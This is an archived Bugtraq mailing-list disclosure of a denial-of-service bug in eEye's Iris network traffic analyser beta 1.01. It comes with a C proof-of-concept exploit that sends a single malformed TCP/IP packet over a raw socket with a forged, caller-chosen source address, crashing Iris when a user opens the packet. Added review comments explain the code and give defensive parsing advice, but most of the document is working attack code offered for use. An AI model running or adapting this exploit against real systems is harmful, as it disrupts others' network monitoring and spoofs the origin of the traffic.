[18736] in bugtraq


eEye Iris the Network traffic analyser DoS

daemon@ATHENA.MIT.EDU (grazer)
Mon Jan 22 20:16:26 2001

Mime-Version: 1.0
Content-Type: multipart/mixed;boundary="==IMail_v5.0=="
Message-ID:  <200101211927.AA211878078@mail.gelrevision.nl>
Date:         Sun, 21 Jan 2001 19:27:08 +0100
Reply-To: termaat@gelrevision.nl
From: grazer <termaat@gelrevision.nl>
To: BUGTRAQ@SECURITYFOCUS.COM

------------------------------------------------------------------------
This mail message contains standard MIME attachments.  If you see this
note, your e-mail program does not support MIME.  You may need a MIME-
compliant mail reader to read any non-text attachments in this message.
------------------------------------------------------------------------

--==IMail_v5.0==
Content-Type: text/plain; charset=us-ascii

Hi there,

There is a vulnerability that causes the Iris network traffic analyser to hang.
I have included an exploit that demonstrates the bug. The exploit sends a packet to the remote host;
when the user on the remote host opens the packet in Iris (to examine it), Iris will quit, leaving an error message.

Sincerely yours,

Wouter ter Maat aka grazer
digit-labs information security
http://www.digit-labs.org


--==IMail_v5.0==
Content-Type: text/plain; name="iris-dos.c"
Content-Transfer-Encoding: binary

/* Denial of Service attack against :
 * Iris The Network Traffic Analyzer beta 1.01
 * ------------------------------------------------
 *
 * Will create an incorrect packet which will cause
 * Iris to hang when it is opened by a user.
 *
 * Vulnerability found by : grazer@digit-labs.org
 * Exploit code by : grazer@digit-labs.org
 *
 * Respect to the guys from eEye, for their fast
 * response.
 *
 * greetings to hit2000, hwa, synnergy, security.is
 *              digit-labs.
 *
 * ---------------> free sk8!!!! <-----------------
 *
 * ------------------------------------------------
 * http://www.digit-labs.org
 *                           grazer@digit-labs.org
 * ------------------------------------------------
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <sys/types.h>
#include <sys/socket.h>

/* Forward declaration: builds the malformed packet and sends it on the raw
 * socket sfd. srcaddr/dstaddr are passed straight through from inet_addr()
 * in main(). */
int build_packet(int sfd, u_long srcaddr, u_long dstaddr);

/*
 * Field names follow the TCP pseudo-header (source, destination, zero byte,
 * protocol, TCP length). In this file it is never fed to a checksum routine;
 * build_packet() overlays it on the packet buffer directly after the IP
 * header.
 * NOTE(review): u_long is platform-sized, so this matches the 12-byte
 * pseudo-header layout only where u_long is 32 bits -- confirm per target.
 */
struct pseudo {
u_long saddr;     /* source address, as given by the caller */
u_long daddr;     /* destination address */
u_char zero;      /* build_packet() stores 1 here despite the name */
u_char protocol;  /* set to IPPROTO_TCP by build_packet() */
u_short length;   /* set to htons(sizeof(struct tcphdr)) by build_packet() */
};

/*
 * Command-line driver for the proof-of-concept described in the advisory.
 *
 * argv[1] is the source address written into the packet and argv[2] the
 * destination. Both go through inet_addr(), so the source address is whatever
 * the caller typed. For anyone reading a capture of this traffic, the source
 * IP is therefore not evidence of origin.
 *
 * Review notes (behaviour kept exactly as posted):
 *  - gethostbyname() is used only as a "does it resolve" test; its result is
 *    discarded and the address still comes from inet_addr(argv[2]).
 *  - every failure path calls exit(0), and the normal path returns 1, so the
 *    exit status does not distinguish success from failure.
 *  - setsockopt() is called with an option length of 1 and its return value
 *    is ignored; build_packet()'s return value is ignored as well.
 *  - the "need root" text is printed for any socket() failure, whatever the
 *    actual cause.
 */
int main(int argc, char **argv)
{
	struct in_addr source_ip, desti_ip;
	int one = 1;
	int check;
	int rawfd;

	/* Fewer than two arguments: print the banner and usage, then stop. */
	if (argc < 3) {
		fprintf(stderr, "\n\n[ IRIS DoS attack - by grazer ]");
		fprintf(stderr, "\n %s localhost remotehost \n\n", argv[0]);
		exit(0);
	}

	fprintf(stderr, "\nStarting Iris DoS...\n");

	/* check holds the boolean "lookup failed", not the host entry. */
	check = (gethostbyname(argv[2]) == NULL);
	if (check) {
		fprintf(stderr, "\nCannot resolve host %s\n", argv[2]);
		exit(0);
	}

	source_ip.s_addr = inet_addr(argv[1]);
	desti_ip.s_addr = inet_addr(argv[2]);

	/* Raw sockets require elevated privileges on typical systems. */
	rawfd = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
	if (rawfd < 0) {
		fprintf(stderr, "\n You need root for this..");
		exit(0);
	}

	/* IP_HDRINCL: the program supplies its own IP header. */
	setsockopt(rawfd, IPPROTO_IP, IP_HDRINCL, &one, 1);

	build_packet(rawfd, source_ip.s_addr, desti_ip.s_addr);

	close(rawfd);
	return 1;
}


/*
 * Fill a stack buffer with an IP header whose fields are deliberately out of
 * range and send it once to dstaddr on sfd.
 *
 * sfd     - socket to send on; main() passes a SOCK_RAW socket on which it
 *           has requested IP_HDRINCL.
 * srcaddr - value copied into ip_src (caller-chosen, see main()).
 * dstaddr - value copied into ip_dst and into the sendto() destination.
 * Returns 1 unconditionally; the sendto() result is not examined.
 *
 * Defensive reading: the advisory says Iris fails when a user opens this
 * packet. Which field triggers the fault is not stated on the page. A packet
 * decoder should check the IP version, the header length, the total length
 * and the fragment offset against the captured byte count before it
 * dereferences anything derived from them.
 */
int build_packet(int sfd, u_long srcaddr,  u_long dstaddr) {

/* Buffer has room for IP header + pseudo struct + TCP header, but only
 * sizeof(struct ip) + sizeof(struct tcphdr) bytes are handed to sendto(). */
u_char packet[sizeof(struct ip) + sizeof(struct pseudo) + sizeof(struct tcphdr)];
struct sockaddr_in sin;
struct in_addr src_inaddr, dest_inaddr;
struct ip *ip = (struct ip *) packet;
/* The pseudo struct sits immediately after the IP header, i.e. where a TCP
 * header would normally begin; the tcp pointer is pushed behind it. */
struct pseudo *pseudo = (struct pseudo *) (packet + sizeof(struct ip));
struct tcphdr *tcp = (struct tcphdr *) (packet + sizeof(struct ip)
+ sizeof(struct pseudo));

	bzero(packet, sizeof(packet));
	bzero(&sin,sizeof(sin));

	src_inaddr.s_addr = srcaddr;
	dest_inaddr.s_addr = dstaddr;

	/* These bytes are sent as payload right after the IP header; no
	 * checksum is computed from them anywhere in this listing. */
	pseudo->saddr = srcaddr;
	pseudo->daddr = dstaddr;
	pseudo->zero = 1;
	pseudo->protocol=IPPROTO_TCP;
	pseudo->length = htons(sizeof (struct tcphdr));

	/* -1 is stored into version, header length, id and fragment offset.
	 * NOTE(review): in the usual <netinet/ip.h> layout ip_v and ip_hl are
	 * 4-bit fields, so they would read back as 0xF (a version that is not
	 * IPv4 and a claimed header longer than struct ip) -- confirm for the
	 * build platform. */
	ip->ip_v = -1;
	ip->ip_hl = -1;
	ip->ip_id = -1;
	ip->ip_src = src_inaddr;
	ip->ip_dst = dest_inaddr;
	ip->ip_p = IPPROTO_TCP;
	ip->ip_ttl = 40;
	ip->ip_off = -1;
	/* Assigned without htons(), unlike pseudo->length above. */
	ip->ip_len = sizeof(struct ip) + sizeof(struct tcphdr);
	/* No srand() call appears in this listing, so rand() runs unseeded.
	 * Because tcp points past the pseudo struct, some or all of these
	 * bytes fall outside the length passed to sendto().
	 * NOTE(review): the member names seq/ack depend on the platform's
	 * struct tcphdr -- confirm what they refer to there. */
	tcp->seq = htonl(rand());
	tcp->ack = htonl(rand());

	sin.sin_family=AF_INET;
	sin.sin_addr.s_addr=dstaddr;
	/* Return value ignored: the message below prints even if the send
	 * failed. */
	sendto(sfd,packet,sizeof(struct ip) + sizeof(struct tcphdr), 0,
	(struct sockaddr *) &sin,sizeof(sin));

        fprintf(stderr, "\n Packet send... \n\n" );

   return 1;}



--==IMail_v5.0==--
